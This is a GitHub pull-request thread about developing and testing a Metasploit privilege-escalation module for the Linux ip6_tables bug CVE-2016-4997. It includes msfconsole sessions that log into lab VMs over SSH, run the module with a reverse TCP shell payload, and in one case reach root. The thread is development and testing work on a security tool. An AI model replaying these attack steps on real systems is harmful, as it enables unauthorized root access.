### PR TITLE
ipv6 tables linux priv esc

### LINKED ISSUE #7443: Module Request: Linux Local CVE-2016-4997
This is on my to do list, but if someone wants to get to it before me, please put a comment in to claim it to prevent duplication of efforts.

[edb](https://www.exploit-db.com/exploits/40489/)

VMs to test [reference](https://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-4997.html): 
- Ubuntu 12.04 LTS kernel < 3.13.0-91
- Ubuntu 14.04(.1) LTS kernel < 4.2.0-41
- Ubuntu 16.04.1 LTS kernel < 4.4.0-28 (souce code verified against 4.4.0-21-generic)

### PR DESCRIPTION
**Pull request by h00die**
This local linux exploit adds a priv esc for ipv6 tables via cve-2016-4997.  closes #7443 
## Verification
- [ ] Start `msfconsole`
- [ ] get a user shell on the right kernel box
- [ ] Do: `use exploit/linux/local/ipv6_table_priv_esc`
- [ ] Do: `set session #`
- [ ] Do: `set target #`
- [ ] Do: `set verbose true`
- [ ] Do: `exploit`
- [ ] Enjoy being root

### CODE REVIEW

**Comment by h00die** [comment]
Looks like this exploits the same vuln as netfilter (same cve), just ipv6 instead of ipv4.
I'd be game to combine them and cancel this, however that would make the targets and checks in netfilter get a little overwhelming.

**Comment by bwatters-r7** [comment]
Looking through, this is not a particularly trivial module before adding more functionality.  What kinds of reuse would be possible through combining?
Lacking other input here, I'll give mine for others to trash if needed... Unless specific code duplication was heavy, I'd opt to keep them separate, especially if we could change the name a bit to something like netfilter_priv_esc_ipv6 and netfilter_prov_esc_ipv4 so both got listed by tab complete.  I welcome any disagreements, though.

**Comment by h00die** [comment]
i like the idea of the name changes. ill make that happen

**Comment by bwatters-r7** [comment]
Finally got a chance to got through this, and I seem to have some problems.....
Target VM kernel:
```Linux ubuntu 4.2.0-27-generic #32~14.04.1-Ubuntu SMP Fri Jan 22 15:32:26 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux```

In the documentation, the steps do not include specifying a target, but your example does.  When I do not select a target, I get:
```
msf exploit(netfilter_priv_esc_ipv6) > exploit

[-] Exploit failed: A target has not been selected.
[*] Exploit completed, but no session was created.
```
Is target required?  It my be my own ignorance, but I'm not even sure what that signifies?

If I set the target to 1 or 2, I still fail:
```
msf exploit(netfilter_priv_esc_ipv6) > exploit

[*] Started reverse TCP handler on <MSF_IP>:4444 
[*] Checking if ip_tables is loaded in kernel
[+] ip6_tables.ko is loaded
[+] Kernel 4.2.0.pre.27.pre.generic is vulnerable
[+] libc6-dev-i386 is installed
[+] gcc is installed
[*] Live compiling exploit on system
[*] Writing to /tmp/YxCFuVUg.c (5207 bytes)
[*] Max line length is 65537
[*] Writing 5207 bytes in 1 chunks of 18905 bytes (octal-encoded), using printf
[*] Compiling /tmp/YxCFuVUg.c
[*] Writing to /tmp/9l45PUVB.c (1765 bytes)
[*] Max line length is 65537
[*] Writing 1765 bytes in 1 chunks of 6432 bytes (octal-encoded), using printf
[*] Compiling /tmp/9l45PUVB.c
[*] Writing to /tmp/sjqnMQYm (158 bytes)
[*] Max line length is 65537
[*] Writing 158 bytes in 1 chunks of 458 bytes (octal-encoded), using printf
[*] Exploiting... This may take around 2min to complete.
[*] /bin/sh: 220: /tmp/YxCFuVUg: not found
[!] This exploit may require manual cleanup of '/tmp/YxCFuVUg.c' on the target
[!] This exploit may require manual cleanup of '/tmp/YxCFuVUg' on the target
[!] This exploit may require manual cleanup of '/tmp/9l45PUVB.c' on the target
[!] This exploit may require manual cleanup of '/tmp/9l45PUVB' on the target
[!] This exploit may require manual cleanup of '/tmp/sjqnMQYm' on the target
[*] Exploit completed, but no session was created.
msf exploit(netfilter_priv_esc_ipv6) > sessions -i 1
```

Am I missing something important?

**Comment by h00die** [comment]
Target is required, none are set by default so a conscious decision has to be made on the target. I like to think that's the best approach since dealing with kernel modules could crash things. I can update the docs to show that better

File: documentation/modules/exploit/linux/local/netfilter_priv_esc_ipv6.md [hunk 1]
```diff
@@ -0,0 +1,264 @@
...
+  
+  1. 4.6.2 
+  2. 4.2.0
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Exploit a box via whatever method
+  4. Do: `use exploit/linux/local/netfilter_priv_esc_ipv6`
+  5. Do: `set session #`
```
Comment (h00die) [inline documentation/modules/exploit/linux/local/netfilter_priv_esc_ipv6.md]: Need to add wet target per @bwatters-r7 comment

**Comment by h00die** [comment]
@bwatters-r7 
1. run `check` to ensure all the components are there that need to be.
2. target is to select which kernel you are running since they have different offsets.  I believe 2 should work
3. 2 did not work, looks like it dropped a .c file, gcc happened, but the binary didn't exist.  gcc must have failed (undetected).  Hopefully running `check` will shine some light on why.  I'm curious as to why it failed since if compile is set to `auto` it should detect something was missing and drop pre-compiled binaries.

**Comment by bwatters-r7** [comment]
Suddenly realized I was waiting for your reply to a comment I never posted....

Not sure what's up, but still having some issues, and I'll try not to disappear again:
(1) In the instructions on the Docs, you do not select a payload during exploitation, yet in your example you do.  When I did not select a payload, it failed, when I selected the same payload you did, I got an invalid payload error.
(2) The target is required, yet it is lot listed when you run "show options."
```
msf exploit(handler) > run

[*] Started reverse TCP handler on <MSF_IP>:4567 
[*] Starting the payload handler...
[*] Sending stage (38 bytes) to <TARGET_IP>
[*] Command shell session 1 opened (<MSF_IP>:4567 -> <TARGET_IP>:60300) at 2016-12-16 11:01:28 -0600

uname -a
Linux ubuntu 4.2.0-27-generic #32~14.04.1-Ubuntu SMP Fri Jan 22 15:32:26 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
^Z
Background session 1? [y/N]  y
msf exploit(handler) > use exploit/linux/local/netfilter_priv_esc_ipv6 
msf exploit(netfilter_priv_esc_ipv6) > set verbose true
verbose => true
msf exploit(netfilter_priv_esc_ipv6) > set session 1
session => 1
msf exploit(netfilter_priv_esc_ipv6) > set target 2
target => 2
msf exploit(netfilter_priv_esc_ipv6) > check

[*] Checking if ip_tables is loaded in kernel
[+] ip6_tables.ko is loaded
[+] Kernel 4.2.0.pre.27.pre.generic is vulnerable
[+] libc6-dev-i386 is installed
[*]  The target appears to be vulnerable.
msf exploit(netfilter_priv_esc_ipv6) > exploit

[-] Exploit failed: A payload has not been selected.
[*] Exploit completed, but no session was created.
msf exploit(netfilter_priv_esc_ipv6) > set payload linux/x64/shell/reverse_tcp
[-] The value specified for payload is not valid.
msf exploit(netfilter_priv_esc_ipv6) > set payload linux/x64/shell/reverse_tcp
[-] The value specified for payload is not valid.
msf exploit(netfilter_priv_esc_ipv6) > show options

Module options (exploit/linux/local/netfilter_priv_esc_ipv6):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   COMPILE      Auto             yes       Compile on target (Accepted: Auto, True, False)
   SESSION      1                yes       The session to run this module on.
   WritableDir  /tmp             yes       A directory where we can write files (must not be mounted noexec)


Exploit target:

   Id  Name
   --  ----
   2   4.4.0-21


```

**Comment by h00die** [comment]
no worries, between going on holiday, and everything else, i'm having a hard time getting back to this as well.  i'll check it out soon and let you know!

**Comment by h00die** [comment]
my ESXi server died this week.  Going to need some time to get it running, to get my VM, to look at this.

**Comment by bwatters-r7** [comment]
Ugh; sorry to hear it.  2016 claims another.

**Comment by h00die** [comment]
its been a while, so i did a rebase.

**Comment by bwatters-r7** [comment]
# Testing
## commit bae4203abfb4314a38070480a6ae4da644524dbe

I must still be missing something....

```
msf exploit(handler) > use exploit/multi/handler 
msf exploit(handler) > set payload linux/x64/shell/reverse_tcp
payload => linux/x64/shell/reverse_tcp
msf exploit(handler) > set LHOST <MSF_IP>
LHOST => <MSF_IP>
msf exploit(handler) > set LPORT 4567
LPORT => 4567
msf exploit(handler) > run

[*] Started reverse TCP handler on <MSF_IP>:4567 
[*] Starting the payload handler...
[*] Sending stage (38 bytes) to <TARGET_IP>
[*] Command shell session 1 opened (<MSF_IP>:4567 -> <TARGET_IP>:48086) at 2017-01-03 11:31:04 -0600

uname -a
Linux ubuntu 4.2.0-27-generic #32~14.04.1-Ubuntu SMP Fri Jan 22 15:32:26 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
^Z
Background session 1? [y/N]  y
msf exploit(handler) > use exploit/linux/local/netfilter_priv_esc_ipv6
msf exploit(netfilter_priv_esc_ipv6) > set session 1
session => 1
msf exploit(netfilter_priv_esc_ipv6) > set target 1
target => 1
msf exploit(netfilter_priv_esc_ipv6) > set lhost <TARGET_IP>
lhost => <TARGET_IP>
msf exploit(netfilter_priv_esc_ipv6) > set compile false
[-] The following options failed to validate: Value 'false' is not valid for option 'COMPILE'.
compile => Auto
msf exploit(netfilter_priv_esc_ipv6) > set compile False
compile => False
msf exploit(netfilter_priv_esc_ipv6) > check
[*]  The target appears to be vulnerable.
msf exploit(netfilter_priv_esc_ipv6) > set verbose true
verbose => true
msf exploit(netfilter_priv_esc_ipv6) > show options

Module options (exploit/linux/local/netfilter_priv_esc_ipv6):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   COMPILE      False            yes       Compile on target (Accepted: Auto, True, False)
   SESSION      1                yes       The session to run this module on.
   WritableDir  /tmp             yes       A directory where we can write files (must not be mounted noexec)


Exploit target:

   Id  Name
   --  ----
   1   4.2.0-27


msf exploit(netfilter_priv_esc_ipv6) > check

[*] Checking if ip_tables is loaded in kernel
[+] ip6_tables.ko is loaded
[+] Kernel 4.2.0.pre.27.pre.generic is vulnerable
[+] libc6-dev-i386 is installed
[*]  The target appears to be vulnerable.
msf exploit(netfilter_priv_esc_ipv6) > exploit

[*] Started reverse TCP handler on <MSF_IP>:4444 
[*] Checking if ip_tables is loaded in kernel
[+] ip6_tables.ko is loaded
[+] Kernel 4.2.0.pre.27.pre.generic is vulnerable
[+] libc6-dev-i386 is installed
[*] Writing to /tmp/cxvXS1Et (7808 bytes)
[*] Max line length is 65537
[*] Writing 7808 bytes in 1 chunks of 21956 bytes (octal-encoded), using printf
[*] Writing to /tmp/euPEmXEw (9264 bytes)
[*] Max line length is 65537
[*] Writing 9264 bytes in 1 chunks of 23971 bytes (octal-encoded), using printf
[*] Writing to /tmp/tlbHJ3An (158 bytes)
[*] Max line length is 65537
[*] Writing 158 bytes in 1 chunks of 458 bytes (octal-encoded), using printf
[*] Exploiting... This may take around 2min to complete.
[*] preparing payload . . .
[*] trigger modified tty_release . . .
[*] failed to get root :(
[!] This exploit may require manual cleanup of '/tmp/cxvXS1Et' on the target
[!] This exploit may require manual cleanup of '/tmp/euPEmXEw' on the target
[!] This exploit may require manual cleanup of '/tmp/tlbHJ3An' on the target
[*] Exploit completed, but no session was created.
msf exploit(netfilter_priv_esc_ipv6) > 
```

**Comment by h00die** [comment]
I'm going to spin up a fresh VM now and write down every command so we can hopefully see what the difference is between us

**Comment by h00die** [comment]
ignore this, its for posting to another draft comment
```
root@k:/metasploit-framework# cat ipv6.rc 
use auxiliary/scanner/ssh/ssh_login
set rhosts 192.168.2.181
set username ipv6
set password ipv6
exploit
use exploit/linux/local/netfilter_priv_esc_ipv6
set verbose true
set payload linux/x64/shell/reverse_tcp
set session 1
#set compile False
set target 1
set lhost 192.168.2.117
check
exploit
root@k:/metasploit-framework# ./msfconsole -r ipv6.rc 

       =[ metasploit v4.13.10-dev-7abb402f99              ]
+ -- --=[ 1610 exploits - 914 auxiliary - 279 post        ]
+ -- --=[ 471 payloads - 39 encoders - 9 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

[*] Processing ipv6.rc for ERB directives.
resource (ipv6.rc)> use auxiliary/scanner/ssh/ssh_login
resource (ipv6.rc)> set rhosts 192.168.2.181
rhosts => 192.168.2.181
resource (ipv6.rc)> set username ipv6
username => ipv6
resource (ipv6.rc)> set password ipv6
password => ipv6
resource (ipv6.rc)> exploit
[*] SSH - Starting bruteforce
[+] SSH - Success: 'ipv6:ipv6' 'uid=1000(ipv6) gid=1000(ipv6) groups=1000(ipv6),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare) Linux ipv6 4.2.0-27-generic #32~14.04.1-Ubuntu SMP Fri Jan 22 15:32:26 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux '
[!] No active DB -- Credential data will not be saved!
[*] Command shell session 1 opened (192.168.2.117:43413 -> 192.168.2.181:22) at 2017-01-07 20:49:37 -0500
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
resource (ipv6.rc)> use exploit/linux/local/netfilter_priv_esc_ipv6
resource (ipv6.rc)> set verbose true
verbose => true
resource (ipv6.rc)> set payload linux/x64/shell/reverse_tcp
payload => linux/x64/shell/reverse_tcp
resource (ipv6.rc)> set session 1
session => 1
resource (ipv6.rc)> set target 1
target => 1
resource (ipv6.rc)> set lhost 192.168.2.117
lhost => 192.168.2.117
resource (ipv6.rc)> check
[!] SESSION may not be compatible with this module.
[*] Checking if ip_tables is loaded in kernel
[+] ip6_tables.ko is loaded
[+] Kernel 4.2.0.pre.27.pre.generic is vulnerable
[+] libc6-dev-i386 is installed
[*]  The target appears to be vulnerable.
resource (ipv6.rc)> exploit
[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 192.168.2.117:4444 
[*] Checking if ip_tables is loaded in kernel
[+] ip6_tables.ko is loaded
[+] Kernel 4.2.0.pre.27.pre.generic is vulnerable
[+] libc6-dev-i386 is installed
[+] gcc is installed
[*] Live compiling exploit on system
[*] Writing to /tmp/indNpPJt.c (5207 bytes)
[*] Max line length is 65537
[*] Writing 5207 bytes in 1 chunks of 18901 bytes (octal-encoded), using printf
[*] Compiling /tmp/indNpPJt.c
[*] Writing to /tmp/5kRBzU6d.c (1765 bytes)
[*] Max line length is 65537
[*] Writing 1765 bytes in 1 chunks of 6422 bytes (octal-encoded), using printf
[*] Compiling /tmp/5kRBzU6d.c
[*] Writing to /tmp/m1W2Blin (206 bytes)
[*] Max line length is 65537
[*] Writing 206 bytes in 1 chunks of 567 bytes (octal-encoded), using printf
[*] Exploiting... This may take around 2min to complete.
[*] Sending stage (38 bytes) to 192.168.2.181
[*] Command shell session 2 opened (192.168.2.117:4444 -> 192.168.2.181:50552) at 2017-01-07 20:50:48 -0500
[+] Deleted /tmp/indNpPJt.c
[+] Deleted /tmp/indNpPJt
[+] Deleted /tmp/5kRBzU6d.c
[+] Deleted /tmp/5kRBzU6d
[+] Deleted /tmp/m1W2Blin

3525861558
TwTngQvTAWILUPvtPkteFNIOStgFeWjM
true
mNtGxZijIkzHiVVyiajdUCUtMLTnREPo
dChVlFfWPArWcKlASUfnCywnWxfRdcFQ
KlDafuzvjuGUPZckhjCLuSzGbvTKEFKD
true
NoZJKTQlfVtcwkRVzsZCJeKxSCWvsAMy
UxxOGJnxZbiUVrmYeOjKwltbVrTyUqBM
PVVYfdSimOrjScRRNwiVJsCFdeHkBWhz
true
eLDjFnUJuyREHUNULCyQUlcVplkxBEAb
LiyicGHpEgqCErqIAruTncabIrusRdhp
YjEAouOGDZaUPbdDhjDxfWzrwxeGKhRB
true
KBzeQeuAAviSmhLBDAkQsAYFUkwAseOR
ftPDpQzPBAoySRHqjPrDSvEXdzrVUyAS
LMgcFEvyYDWuLCFzmtysDOvJfkrUckcT
true
RMoTQZhsUIUMmpDxbTutgKGAQkfibSog
vifUsmjbsDeOKzfEMDcnbgKzxuRaUZbq
DhDYMeEfltTphxvbgASbilGluRPkfJda
whoami
root
```

**Comment by h00die** [comment]
## VM Settings/Install:

Ubuntu 14.04 (sever) 64bit
1gig ram
default disk layout, no LVM
No auto updates
Added SSH server to install packages.

## On first boot:
```
sudo apt-get install linux-image-4.2.0-27-generic; sudo reboot;
sudo apt-get install build-essential;
sudo apt-get install libc6-dev-i386;
sudo reboot;
sudo ip6tables -L;
```

## Metasploit
```
root@k:/metasploit-framework# cat ipv6.rc 
use auxiliary/scanner/ssh/ssh_login
set rhosts 192.168.2.181
set username ipv6
set password ipv6
exploit
use exploit/linux/local/netfilter_priv_esc_ipv6
set verbose true
set payload linux/x64/shell/reverse_tcp
set session 1
#set compile False
set target 1
set lhost 192.168.2.117
check
exploit
root@k:/metasploit-framework# ./msfconsole -r ipv6.rc 

       =[ metasploit v4.13.10-dev-7abb402f99              ]
+ -- --=[ 1610 exploits - 914 auxiliary - 279 post        ]
+ -- --=[ 471 payloads - 39 encoders - 9 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

[*] Processing ipv6.rc for ERB directives.
resource (ipv6.rc)> use auxiliary/scanner/ssh/ssh_login
resource (ipv6.rc)> set rhosts 192.168.2.181
rhosts => 192.168.2.181
resource (ipv6.rc)> set username ipv6
username => ipv6
resource (ipv6.rc)> set password ipv6
password => ipv6
resource (ipv6.rc)> exploit
[*] SSH - Starting bruteforce
[+] SSH - Success: 'ipv6:ipv6' 'uid=1000(ipv6) gid=1000(ipv6) groups=1000(ipv6),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare) Linux ipv6 4.2.0-27-generic #32~14.04.1-Ubuntu SMP Fri Jan 22 15:32:26 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux '
[!] No active DB -- Credential data will not be saved!
[*] Command shell session 1 opened (192.168.2.117:43413 -> 192.168.2.181:22) at 2017-01-07 20:49:37 -0500
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
resource (ipv6.rc)> use exploit/linux/local/netfilter_priv_esc_ipv6
resource (ipv6.rc)> set verbose true
verbose => true
resource (ipv6.rc)> set payload linux/x64/shell/reverse_tcp
payload => linux/x64/shell/reverse_tcp
resource (ipv6.rc)> set session 1
session => 1
resource (ipv6.rc)> set target 1
target => 1
resource (ipv6.rc)> set lhost 192.168.2.117
lhost => 192.168.2.117
resource (ipv6.rc)> check
[!] SESSION may not be compatible with this module.
[*] Checking if ip_tables is loaded in kernel
[+] ip6_tables.ko is loaded
[+] Kernel 4.2.0.pre.27.pre.generic is vulnerable
[+] libc6-dev-i386 is installed
[*]  The target appears to be vulnerable.
resource (ipv6.rc)> exploit
[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 192.168.2.117:4444 
[*] Checking if ip_tables is loaded in kernel
[+] ip6_tables.ko is loaded
[+] Kernel 4.2.0.pre.27.pre.generic is vulnerable
[+] libc6-dev-i386 is installed
[+] gcc is installed
[*] Live compiling exploit on system
[*] Writing to /tmp/indNpPJt.c (5207 bytes)
[*] Max line length is 65537
[*] Writing 5207 bytes in 1 chunks of 18901 bytes (octal-encoded), using printf
[*] Compiling /tmp/indNpPJt.c
[*] Writing to /tmp/5kRBzU6d.c (1765 bytes)
[*] Max line length is 65537
[*] Writing 1765 bytes in 1 chunks of 6422 bytes (octal-encoded), using printf
[*] Compiling /tmp/5kRBzU6d.c
[*] Writing to /tmp/m1W2Blin (206 bytes)
[*] Max line length is 65537
[*] Writing 206 bytes in 1 chunks of 567 bytes (octal-encoded), using printf
[*] Exploiting... This may take around 2min to complete.
[*] Sending stage (38 bytes) to 192.168.2.181
[*] Command shell session 2 opened (192.168.2.117:4444 -> 192.168.2.181:50552) at 2017-01-07 20:50:48 -0500
[+] Deleted /tmp/indNpPJt.c
[+] Deleted /tmp/indNpPJt
[+] Deleted /tmp/5kRBzU6d.c
[+] Deleted /tmp/5kRBzU6d
[+] Deleted /tmp/m1W2Blin

3525861558
TwTngQvTAWILUPvtPkteFNIOStgFeWjM
true
mNtGxZijIkzHiVVyiajdUCUtMLTnREPo
dChVlFfWPArWcKlASUfnCywnWxfRdcFQ
KlDafuzvjuGUPZckhjCLuSzGbvTKEFKD
true
NoZJKTQlfVtcwkRVzsZCJeKxSCWvsAMy
UxxOGJnxZbiUVrmYeOjKwltbVrTyUqBM
PVVYfdSimOrjScRRNwiVJsCFdeHkBWhz
true
eLDjFnUJuyREHUNULCyQUlcVplkxBEAb
LiyicGHpEgqCErqIAruTncabIrusRdhp
YjEAouOGDZaUPbdDhjDxfWzrwxeGKhRB
true
KBzeQeuAAviSmhLBDAkQsAYFUkwAseOR
ftPDpQzPBAoySRHqjPrDSvEXdzrVUyAS
LMgcFEvyYDWuLCFzmtysDOvJfkrUckcT
true
RMoTQZhsUIUMmpDxbTutgKGAQkfibSog
vifUsmjbsDeOKzfEMDcnbgKzxuRaUZbq
DhDYMeEfltTphxvbgASbilGluRPkfJda
whoami
root
```

**Comment by h00die** [comment]
thats a step by step, nothing left out.  Now, if you have time, spin up a new VM exactly how i showed and if it works, then i'm most curious on figuring out why your OLD one didn't.  Normally i'd think it was a dependency issue, but the C compiled it looks like, so i'm just not sure.
Reboots are always a good idea too when exploiting kernel modules

**Comment by bwatters-r7** [comment]
OK; so getting closer.

On the VM I was using for testing, I downgraded the kernel, and booted through the grub menu to the older kernel.  That VM did not have build essential installed, but did have gcc.  The lack of build-essential seems to have caused the failure to compile.  
Sadly, even when it compiled, it failed to get root:

```
msf exploit(netfilter_priv_esc_ipv6) > show options

Module options (exploit/linux/local/netfilter_priv_esc_ipv6):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   COMPILE      Auto             yes       Compile on target (Accepted: Auto, True, False)
   SESSION      1                yes       The session to run this module on.
   WritableDir  /tmp             yes       A directory where we can write files (must not be mounted noexec)


Payload options (linux/x64/shell/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  <MSF_IP>   yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   4.2.0-27


msf exploit(netfilter_priv_esc_ipv6) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on <MSF_IP>:4444 
[*] Checking if ip_tables is loaded in kernel
[+] ip6_tables.ko is loaded
[+] Kernel 4.2.0.pre.27.pre.generic is vulnerable
[+] libc6-dev-i386 is installed
[+] gcc is installed
[*] Live compiling exploit on system
[*] Writing to /tmp/jEhsve51.c (5207 bytes)
[*] Max line length is 65537
[*] Writing 5207 bytes in 1 chunks of 18905 bytes (octal-encoded), using printf
[*] Compiling /tmp/jEhsve51.c
[*] Writing to /tmp/MUqEXHLX.c (1765 bytes)
[*] Max line length is 65537
[*] Writing 1765 bytes in 1 chunks of 6422 bytes (octal-encoded), using printf
[*] Compiling /tmp/MUqEXHLX.c
[*] Writing to /tmp/C9ylCua8 (206 bytes)
[*] Max line length is 65537
[*] Writing 206 bytes in 1 chunks of 568 bytes (octal-encoded), using printf
[*] Exploiting... This may take around 2min to complete.
[*] preparing payload . . .
[*] trigger modified tty_release . . .
[*] failed to get root :(
[!] This exploit may require manual cleanup of '/tmp/jEhsve51.c' on the target
[!] This exploit may require manual cleanup of '/tmp/jEhsve51' on the target
[!] This exploit may require manual cleanup of '/tmp/MUqEXHLX.c' on the target
[!] This exploit may require manual cleanup of '/tmp/MUqEXHLX' on the target
[!] This exploit may require manual cleanup of '/tmp/C9ylCua8' on the target
[*] Exploit completed, but no session was created.
```

Just for fun, I went to the VM and ran the exploit directly on target, I got:

```
bwatters@ubuntu:/tmp$ ./jEhsve51
pwn begin, let the bullets fly . . .
and wait for a minute . . .
pwn over, let's enjoy!
preparing payload . . .
trigger modified tty_release . . .
failed to get root :(
```

Well, crap....
So then I followed your example and built an Ubuntu server VM per your example, and tested there......
It fails _differently_

```
tychosmoose@ubuntu:~/rapid7/metasploit-framework$ ./msfconsole -q
msf exploit(handler) > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set rhosts <ubuntu_server_IP>
rhosts => <ubuntu_server_IP>
msf auxiliary(ssh_login) > set username bwatters
username => bwatters
msf auxiliary(ssh_login) > set password <password>
password => <password>
msf auxiliary(ssh_login) > exploit

[*] SSH - Starting bruteforce
[+] SSH - Success: 'bwatters:<password>' 'uid=1000(bwatters) gid=1000(bwatters) groups=1000(bwatters),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare) Linux ubuntu14server 4.2.0-27-generic #32~14.04.1-Ubuntu SMP Fri Jan 22 15:32:26 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux '
[*] Command shell session 1 opened (<MSF_IP>:38618 -> <ubuntu_server_IP>:22) at 2017-01-09 11:06:36 -0600
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) > use exploit/linux/local/netfilter_priv_esc_ipv6
msf exploit(netfilter_priv_esc_ipv6) > set verbose true
verbose => true
msf exploit(netfilter_priv_esc_ipv6) > set payload linux/x64/shell/reverse_tcp 
payload => linux/x64/shell/reverse_tcp
msf exploit(netfilter_priv_esc_ipv6) > set session 1
session => 1
msf exploit(netfilter_priv_esc_ipv6) > set target 1
target => 1
msf exploit(netfilter_priv_esc_ipv6) > set lhost <MSF_IP>
lhost => <MSF_IP>
msf exploit(netfilter_priv_esc_ipv6) > check

[!] SESSION may not be compatible with this module.
[*] Checking if ip_tables is loaded in kernel
[+] ip6_tables.ko is loaded
[+] Kernel 4.2.0.pre.27.pre.generic is vulnerable
[+] libc6-dev-i386 is installed
[*]  The target appears to be vulnerable.
msf exploit(netfilter_priv_esc_ipv6) > exploit

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on <MSF_IP>:4444 
[*] Checking if ip_tables is loaded in kernel
[+] ip6_tables.ko is loaded
[+] Kernel 4.2.0.pre.27.pre.generic is vulnerable
[+] libc6-dev-i386 is installed
[+] gcc is installed
[*] Live compiling exploit on system
[*] Writing to /tmp/couf0AHt.c (5207 bytes)
[*] Max line length is 65537
[*] Writing 5207 bytes in 1 chunks of 18905 bytes (octal-encoded), using printf
[*] Compiling /tmp/couf0AHt.c
[*] Writing to /tmp/UudHVNsr.c (1765 bytes)
[*] Max line length is 65537
[*] Writing 1765 bytes in 1 chunks of 6424 bytes (octal-encoded), using printf
[*] Compiling /tmp/UudHVNsr.c
[*] Writing to /tmp/PS8boeFp (206 bytes)
[*] Max line length is 65537
[*] Writing 206 bytes in 1 chunks of 568 bytes (octal-encoded), using printf
[*] Exploiting... This may take around 2min to complete.
[*] preparing payload . . .
[*] trigger modified tty_release . . .
[*] failed to get root :(
[!] This exploit may require manual cleanup of '/tmp/couf0AHt.c' on the target
[!] This exploit may require manual cleanup of '/tmp/couf0AHt' on the target
[!] This exploit may require manual cleanup of '/tmp/UudHVNsr.c' on the target
[!] This exploit may require manual cleanup of '/tmp/UudHVNsr' on the target
[!] This exploit may require manual cleanup of '/tmp/PS8boeFp' on the target
[*] Exploit completed, but no session was created.

```

That seems better, but on the terminal, I get a stacktrace:
pr7491_crash_1
pr7491_crash_2

**Comment by wwebb-r7** [comment]
The 'enjoy' component from the original exploits hits an oops every time for me as well while using the same test environment.

**Comment by h00die** [comment]
Thinks @bwatters-r7 should have someone else try it.  Sees @wwebb-r7 's comment, starts to openly cry.

Well, I just dont know, since I didn't write the original C code, and I'm not a C dev, I don't know what the underlying issue might be.  There's obviously at least a dependency for compilation missing, that I know, but thats minor compared to the whole thing not working.
Other than a 3rd person trying it (which wouldn't really solve anything, it needs to just work), or having someone smart look at the code, I'm at a loss for how to proceed. 👎

**Comment by wwebb-r7** [comment]
I haven't studied the vulnerability or the exploit at all; however, if only to satisfy my own curiosity, I may do just that and walk through it in gdb.  I have no ETA on when that might happen.  I'll leave it up to @bwatters-r7 as to whether this should be closed or left open in the time being.

**Comment by h00die** [comment]
I'm ok either way.  The ipv4 code works, so i think this is much more the edge case.  Lets just close and if it ever comes up, at least this ticket is here and can show the work etc.

**Pull request closed without merging**